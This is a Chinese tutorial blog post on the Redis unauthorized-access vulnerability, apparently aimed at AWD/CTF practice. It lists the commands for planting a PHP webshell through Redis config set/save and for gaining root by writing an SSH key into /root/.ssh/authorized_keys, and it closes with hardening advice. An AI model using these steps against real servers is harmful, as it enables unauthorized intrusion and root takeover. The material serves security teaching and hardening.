redis访问未授权漏洞

漏洞成因:

  1. 默认绑定在0.0.0.0:6379 且没有添加防火墙规则,导致暴漏在公网中
  2. 没有设置密码认证,(一般为空),可以免密码远程登录redis服务。
    漏洞危害:
  3. 无需认证,直接登录。导致敏感信息泄露
  4. 写入木马。
启动redis
redis-server /etc/redis.conf

在这里插入图片描述

利用方式:常用第一种

1)写入webshell

需要拥有读写权限
需要知道web目录,AWD中目录一样。
进入redis的src目录,执行登录命令
./redis-cli -h 目标ip
启动redis

执行以下命令进行写入webshell

config set dir /var/www/html     指定写入目录
config set dbfilename shell.php  指定shell文件名
set webshell "<?php phpinfo();?>" 指定shell内容
save或bgsave       

就可以成功在/var/www/html写入shell.php文件

2)利用"公私钥"认证获取root权限

使用条件:靶机redis需要以root权限运行
攻击机生成ssh公钥和私钥,密码设为空
在这里插入图片描述

进入.ssh,将生成的公钥保存到1.txt
在这里插入图片描述

连接靶机redis服务
将存有ssh公钥的1.txt写入redis。
在这里插入图片描述

登录redis靶机,获得redis备份路径
在这里插入图片描述

更改redis备份路径为ssh公钥存放目录(默认为/root/.ssh)
在这里插入图片描述

设置上传公钥的备份文件名字为authorized_keys:
在这里插入图片描述

保存并退出
在这里插入图片描述

使用ssh免密登录

ssh -i id_rsa root@192.168.0.104

加固方式:
1) 设置密码
编辑etc/redis.conf
添加密码

requirepass 密码

2) 设置访问IP
开启ip绑定
在这里插入图片描述

最后重启redis

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值